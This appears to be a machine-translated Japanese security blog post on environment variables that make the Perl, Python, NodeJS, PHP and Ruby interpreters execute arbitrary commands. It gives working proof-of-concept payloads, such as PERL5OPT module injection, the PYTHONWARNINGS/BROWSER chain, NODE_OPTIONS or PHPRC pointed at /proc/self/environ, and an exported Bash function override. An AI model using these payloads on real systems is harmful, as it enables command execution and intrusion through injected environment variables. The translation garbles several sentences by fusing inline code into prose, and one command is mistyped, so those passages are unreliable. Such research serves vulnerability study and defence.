スクリプトインタープリターにロードする興味深い環境変数

前書き

最近のハッキングプロジェクトでは、環境変数を指定する機能がありましたが、実行中のプロセスは指定できませんでした。また、ディスク上のファイルの内容を制御することもできず、リモートLD_PRELOADエクスプロイトを除いて、プロセス識別子（PID）とファイル記述子のブルートフォースは興味深い結果をもたらしませんでした。幸い、スクリプト言語インタープリターが実行され、特定の環境変数を設定することで任意のコマンドを実行できました。このブログでは、悪意のある環境変数の下で、さまざまなスクリプト言語インタープリターが任意のコマンドを実行する方法について説明しています。

Perl

ENVIRONMENTマンページの セクションをざっと読むと、perlrun(1)調査する価値のある多くの環境変数が明らかになります。環境変数をPERL5OPT使用すると、コマンドラインオプションを設定できますが、オプションの受け入れのみに制限されていますCDIMTUWdmtw。残念ながら、これは不足を意味し、-e実行するためにperlコードをロードすることを可能にします。



ただし、Hacker FantasticのCVE-2016-1531のエクスプロイトに示されているように、すべてが失われるわけではありません。このエクスプロイトは、悪意のあるperlモジュールをファイルに書き込み、環境変数を提供し、任意のコードを実行します。ただし、これはローカル特権エスカレーションの脆弱性の悪用であり、一般的な方法ではファイルシステムへのアクセスを必要としないのが理想的です。見つめている/tmp/root.pmPERL5OPT=-MrootPERL5LIB=/ tmp同じCVEのためにblastyによって悪用され、彼はファイルの作成を必要とせず、環境変数PERL5OPT=-dを使用しました PERL5DB=system("sh");exit;。2013年には、同じ変数を使用してCTF問題を解決しました。



一般的な方法の最後の微妙な点は、2つではなく1つの環境変数を使用することです。@justinstevenは、これがで可能であることを発見しましたPERL5OPT=-M。perlモジュールをダウンロードするときは、-mまたはのいずれかを使用できます-Mが、オプションを-M使用すると、モジュール名の後にコードを追加できます。

コンセプトの証明

例0：環境変数を使用して任意のコードを実行するのに対してperlは空のスクリプトを実行する（/ dev / null）

$ docker run --env 'PERL5OPT=-Mbase;print(`id`)' perl:5.30.2 perl /dev/null
uid=0(root) gid=0(root) groups=0(root)

Python

セクションから判断するENVIRONMENT VARIABLESにマナでpython(1)、それはPYTHONSTARTUP最初は簡単な解決策のように見えます。プロンプトがインタラクティブに表示される前に実行されるPythonスクリプトへのパスを指定できます。コマンドラインPYTHONINSPECTと同じよう-iに、環境変数を使用してインタラクティブモードに入ることができるため、インタラクティブモードの要件は問題ではないようです。ただし、このオプションのドキュメントでは、実行するスクリプトを使用してpythonを起動したときに-i何PYTHONSTARTUPが使用されないかについて説明しています。これは、PYTHONSTARTUP両方PYTHONINSPECTを組み合わせることはできずPYTHONSTARTUP、PythonREPLがすぐに開始された場合にのみ効果があることを意味します。これは最終的にはPYTHONSTARTUP通常のPythonスクリプトを実行しても効果がないため、実行できません。



環境変数PYTHONHOMEと有望に見えたPYTHONPATH。どちらも任意のコード実行を許可しますが、ファイルシステム上にディレクトリとファイルを作成できる必要があります。仮想/ procファイルシステムおよび/またはzipファイルを使用することにより、これらの要件を緩和できる場合があります。



残りの環境変数のほとんどは、空でない文字列がないかチェックされるだけで、空でない場合は、一般的に無害な設定が含まれています。まれな例外の1つはPYTHONWARNINGSです。

PYTHONWARNINGSの操作

のドキュメントにPYTHONWARNINGSは、これはパラメータの指定と同等であると記載されています-W。このパラメーターは-W、アラートを指定するアラート管理と、アラートを表示する頻度に使用されます。引数の完全な形式はaction:message:category:module:lineです。アラートの監視は有望な手がかりのようには見えませんでしたが、実装をテストした後、これはすぐに変わりました。



例1：Python-3.8.2 / Lib / warnings.py

[...]
def _getcategory(category):
    if not category:
        return Warning
    if '.' not in category:
        import builtins as m
        klass = category
    else:
        module, _, klass = category.rpartition('.')
        try:
            m = __import__(module, None, None, [klass])
        except ImportError:
            raise _OptionError("invalid module name: %r" % (module,)) from None
[...]

このコードは、指定したカテゴリにドットが含まれている限り、任意のPythonモジュールのインポートを開始できることを示しています。



次の問題は、Python標準ライブラリのモジュールの大部分がインポート時にほとんどコードを実行しないことです。これらは通常、後で使用するクラスを定義するだけであり、実行するコードを提供する場合でも、コードは通常、__ main__変数をチェックすることによって保護されます（ファイルがインポートされたか直接実行されたかを判別するため）。



この規則の予期しない例外は、反重力モジュールです。2008年のPython開発者には、実行することで呼び出すことができるイースターエッグが含まれていましたimport antigravity..。このインポートにより、すぐにブラウザでxkcdコミックが開かれ、Pythonでの反重力インポートによって飛行が可能になります。



モジュールantigravityがブラウザを開く方法については、標準ライブラリの別のモジュールを使用しますwebbrowser。このモジュールは、モザイク、オペラ、スキップストーン、コンケラー、クローム、クロム、ファイアフォックス、リンク、eリンク、リンクスなど、さまざまなブラウザーのPATHをチェックします。またBROWSER、実行するプロセスを示す環境変数も受け入れます。環境変数のプロセスに引数を指定することはできません。コミックのxkcdurlは、コマンドのハードコードされた唯一の引数です。



これを任意のコード実行に変換できるかどうかは、システムで使用できる他の実行可能ファイルによって異なります。

Perlを使用して任意のコードを実行する

1つのアプローチは、Perlを使用することです。これは通常、システムにインストールされ、標準のPythonDockerイメージでも使用できます。ただし、perl最初で唯一の引数はコミックのxkcd urlであるため、バイナリを単独で使用することはできません。この引数はエラーをスローし、プロセスは環境変数を使用せずに終了しますPERL5OPT。



例2：URLがperlに渡された場合、PERL5OPTは効果がありません

$ docker run -e 'PERL5OPT=-Mbase;print(`id`);exit' perl:5.30.2 perl https://xkcd.com/353/
Can't open perl script "https://xkcd.com/353/": No such file or directory

幸い、Perlが利用可能な場合、perldocやperlthanksなどのデフォルトのPerlスクリプトも利用できることがよくあります。これらのスクリプトも無効な引数で失敗しますが、この場合のエラーは、環境変数PERL5OPTの処理よりも後に発生します。これは、このブログで前述したPerl環境変数ペイロードを使用できることを意味します。



例3：PERL5OPTは、perldocおよびperlthanksで期待どおりに機能します

$ docker run -e 'PERL5OPT=-Mbase;print(`id`);exit' perl:5.30.2 perldoc https://xkcd.com/353/
uid=0(root) gid=0(root) groups=0(root)
$ run -e 'PERL5OPT=-Mbase;print(`id`);exit' perl:5.30.2 perlthanks https://xkcd.com/353/
uid=0(root) gid=0(root) groups=0(root)

コンセプトの証明

例4：Python2およびPython3で複数の環境変数を使用して任意のコードを実行する

$ docker run -e 'PYTHONWARNINGS=all:0:antigravity.x:0:0' -e 'BROWSER=perlthanks' -e 'PERL5OPT=-Mbase;print(`id`);exit;' python:2.7.18 python /dev/null
uid=0(root) gid=0(root) groups=0(root)
Invalid -W option ignored: unknown warning category: 'antigravity.x'

$ docker run -e 'PYTHONWARNINGS=all:0:antigravity.x:0:0' -e 'BROWSER=perlthanks' -e 'PERL5OPT=-Mbase;print(`id`);exit;' python:3.8.2 python /dev/null
uid=0(root) gid=0(root) groups=0(root)
Invalid -W option ignored: unknown warning category: 'antigravity.x'

NodeJS

ミハルBentkowskiは（CVE-2019から7609）エクスプロイトKibanaのペイロードを掲載に彼のブログ。プロトタイプの汚染の脆弱性を使用して、任意の環境変数を設定し、その結果、任意のコマンドが実行されました。 Michalからのペイロードは、特に環境変数NODE_OPTIONSとprocファイルシステムを使用していました/proc/self/environ。



Michalのテクニックは創造的であり、彼の場合はうまく機能しますが、常に機能することが保証されているわけではなく、対処するのに適したいくつかの制限があります。



最初の制限は、それが使用することです/proc/self/environコンテンツをJavaScriptによって構文的に有効にできる場合のみ。これを行うには、環境変数を作成してファイルの内容に最初に表示されるようにするか、最初に表示さ/proc/self/environれる環境変数の名前を知って/チートしてその値を上書きできるようにする必要があります。



もう1つの制限は、最初の環境変数の値が1行のコメント（//）で終わることです。したがって、他の環境変数のnewline文字は、構文エラーを引き起こし、ペイロードの実行を妨げる可能性があります。複数行のコメント（/ *）を使用しても、構文的に正しくするために閉じる必要があるため、問題は修正されません。したがって、まれに、環境変数に新行文字が含まれている場合、環境変数の名前を認識/設定解除し、その値を新行を含まない新しい値で上書きする必要があります。



これらの制限の排除は、読者の練習として残しておきます。

コンセプトの証明

例5.MichalBentkowskiのNodeJSに対して環境変数を使用して任意のコードを実行する

$ docker run -e 'NODE_VERSION=console.log(require("child_process").execSync("id").toString());//' -e 'NODE_OPTIONS=--require /proc/self/environ' node:14.2.0 node /dev/null
uid=0(root) gid=0(root) groups=0(root)

PHP

これを実行するとltrace -e getenv php /dev/null、PHPが環境変数を使用していることがわかりますPHPRC。環境変数は、構成ファイルを見つけてロードしようとするときに使用されますphp.ini。CVE-2019-11043のneexエクスプロイトは、多数のPHPパラメーターを使用して、任意のコードを強制的に実行します。ではオレンジツァイも持っている優れたポスト設定のわずかに異なるリストを使用CVE、のために活用する独自の作成についてを。この知識、以前のNodeJS手法から得られた知識、およびBrendan Scarwellからのいくつかの助けを使用して、2つの環境変数を持つPHPソリューションが見つかりました。



この方法には、NodeJSの例と同じ制限があります。

コンセプトの証明

例6：PHPに対して環境変数を使用して任意のコードを実行する

$ docker run -e $'HOSTNAME=1;\nauto_prepend_file=/proc/self/environ\n;<?php die(`id`); ?>' -e 'PHPRC=/proc/self/environ' php:7.3 php /dev/null
HOSTNAME=1;
auto_prepend_file=/proc/self/environ
;uid=0(root) gid=0(root) groups=0(root)

ルビー

Rubyの普遍的な解決策はまだ見つかっていません。Rubyは、RUBYOPTコマンドラインオプションを指定するための環境変数を受け入れます。マンページには、RUBYOPTには-d, -E, -I, -K, -r, -T, -U, -v, -w, -W, --debug, --disable-FEATURE --enable-FEATURE。のみを含めることができると記載されています。最も有望なオプションは-r、requireを使用してRubyにライブラリをロードさせることです。ただし、これは拡張子が.rbまたはのファイルに限定されます.so。



私が見つけた、比較的便利なファイルの例が.rbあるtools/server.rbのFedoraシステム上でのRubyをインストールした後に利用可能であるJSON宝石から。このファイルが必要な場合、Webサーバーは次のように起動されます：



例7：RUBYOPT環境変数を使用してrubyプロセスを開始し、Webサーバーを起動します

$ docker run -it --env 'RUBYOPT=-r/usr/share/gems/gems/json-2.3.0/tools/server.rb' fedora:33 /bin/bash -c 'dnf install -y ruby 1>/dev/null; ruby /dev/null'
Surf to:
http://27dfc3850fbe:6666
[2020-06-17 05:43:47] INFO  WEBrick 1.6.0
[2020-06-17 05:43:47] INFO  ruby 2.7.1 (2020-03-31) [x86_64-linux]
[2020-06-17 05:43:47] INFO  WEBrick::HTTPServer#start: pid=28 port=6666

Fedoraのもう1つのアプローチは、/usr/bin/rubyを起動するBashスクリプトが実際にあるという事実を利用することです/usr/bin/ruby-mri。スクリプトは、環境変数で上書きできるBash関数を呼び出します。

コンセプトの証明

例8：エクスポートされたBash関数を使用して任意のコマンドを実行する

$ docker run --env 'BASH_FUNC_declare%%=() { id; exit; }' fedora:33 /bin/bash -c 'dnf install ruby -y 1>/dev/null; ruby /dev/null'
uid=0(root) gid=0(root) groups=0(root)

結論

この投稿では、ファイルをディスクに書き込まずに、さまざまなスクリプト言語インタープリターを介して任意のコードを実行するのに役立つ環境変数のいくつかの興味深い使用例について説明しました。読んで楽しんで、これらの言語や他のスクリプト言語の改善されたペイロードを見つけて共有することに興味を持っていただけたでしょうか。Rubyに対して機能する一般的な手法を見つけた場合、それについて聞くのは非常に興味深いでしょう。

参照：「DotfileMadness」